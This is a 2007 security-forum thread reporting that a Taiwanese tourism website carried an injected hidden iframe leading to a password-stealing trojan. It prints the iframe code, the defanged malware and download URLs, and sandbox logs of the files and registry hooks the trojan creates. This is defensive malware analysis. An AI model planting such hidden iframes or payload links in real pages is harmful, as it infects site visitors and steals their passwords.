【木馬】淡水漁人碼頭網站被植入惡意連結

  • 【木馬】淡水漁人碼頭網站被植入惡意連結

    • 顯示結果從第 1 筆 到 2 筆,共計 2 筆
    1. 2007-07-13, 11:19 AM #1
      Roger
      Roger 目前未上線
      會員
      註冊日期
      2007-03-22
      所在地區
      CABLE
      討論區文章
      94

      【木馬】淡水漁人碼頭網站被植入惡意連結

      轉自大砲開講
      http://rogerspeaking.blogspot.com/20...post_3071.html

      被植入惡意連結的網站
      hxxp://www.fisherman.com.tw/

      網頁code:
      </tr>
      </table>

      </div>
      </body>
      </html>
      <iframe src=hxxp://www.misofthelp.com/help/help.htm width=0 height=0 frameborder=0></iframe>
      但是,他用到US-ASCII,我不會解

      所以,我只抓到下面這隻
      hxxp://www.misofthelp.com/help/update.exe

      運行update.exe,發現下列行為,被EQ-Secure RC4攔截!
      2007-07-13 11:03:08 创建文件 操作:允许
      进程路径:D:\桌面\virus\update\update.exe
      文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\system32\winCreate.exe
      触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


      2007-07-13 11:03:08 创建文件 操作:允许
      进程路径:D:\桌面\virus\update\update.exe
      文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
      触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


      2007-07-13 11:03:08 创建注册表值 操作:阻止
      进程路径:D:\桌面\virus\update\update.exe
      注册表路径:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
      注册表名称:{6F4747B0-4094-4200-A251-866989504B17}
      触发规则:所有程序规则->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*


      2007-07-13 11:03:08 加载库文件 操作:允许
      进程路径:D:\桌面\virus\update\update.exe
      文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
      触发规则:黑名单->2.1组:禁止从Temp文件夹运行程序->C:\Documents and Settings\*\Application Data\Sandbox\*
      1.他會在C\windows\system32\生成
      winCreate.exe
      2.他會在C\Program Files\Common Files\生成
      search.dll
      3.他會创建注册表值
      HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
      {6F4747B0-4094-4200-A251-866989504B17}
      4.他會加载库文件
      C\Program Files\Common Files\search.dll

      有用HIPS測試的人,可以看update.exe是否會"安裝全局鉤子"?

      有人可以教我,US-ASCII要如何解碼嗎?


      附加檔案 附加檔案
      此文章於 2007-07-13 12:03 PM 被 Roger 編輯。
      回覆時引用此文章 回覆時引用此文章
    2. 2007-07-14, 07:52 PM #2
      proll
      proll 目前未上線
      Bad Boy proll 的大頭照
      註冊日期
      2005-07-20
      討論區文章
      1,039

      回覆: 【木馬】淡水漁人碼頭網站被植入惡意連結

      這個地址,木馬作者一直在用,樣本一直在更新,真佩服作者的毅力。
      [Found possible virus] <W32/PWStealer1!Generic> \update.exeAndsons\drive\C\Program Files\Common Files\search.dll
      [Found possible virus] <W32/PWStealer1!Generic> \update.exeAndsons\drive\C\windows\system32\winCreate.exe
      [Found possible virus] <W32/PWStealer1!Generic> \update.exeAndsons\update.exe
      回覆時引用此文章 回覆時引用此文章
    « 上一個主題 | 下一個主題 »

    類似的主題

    1. 【病毒】ESPNSTAR 體育台網站被植入惡意連結
      作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
      回覆: 1
      最後發表: 2007-03-29, 03:25 AM
    2. 【病毒轉貼】東風電視台網站被植入惡意連結
      作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
      回覆: 0
      最後發表: 2007-03-27, 09:03 PM
    3. 【病毒轉貼】時報旅遊 (中國時報旅行社) 網站又被植入惡意連結
      作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
      回覆: 9
      最後發表: 2007-03-23, 10:29 AM
    4. 【病毒轉貼】兆豐國際商業銀行網站被植入惡意連結
      作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
      回覆: 0
      最後發表: 2007-03-19, 09:16 AM
    5. 【警告】華視首頁又被植入惡意連結
      作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
      回覆: 3
      最後發表: 2007-02-26, 10:29 AM

     

    此網頁沒有從搜尋引擎而來的訪客

    書籤

    發表文章規則

    • 不可以發表新主題
    • 不可以回覆文章
    • 不可以上傳附加檔案
    • 不可以編輯自己的文章
    •  

    討論版規則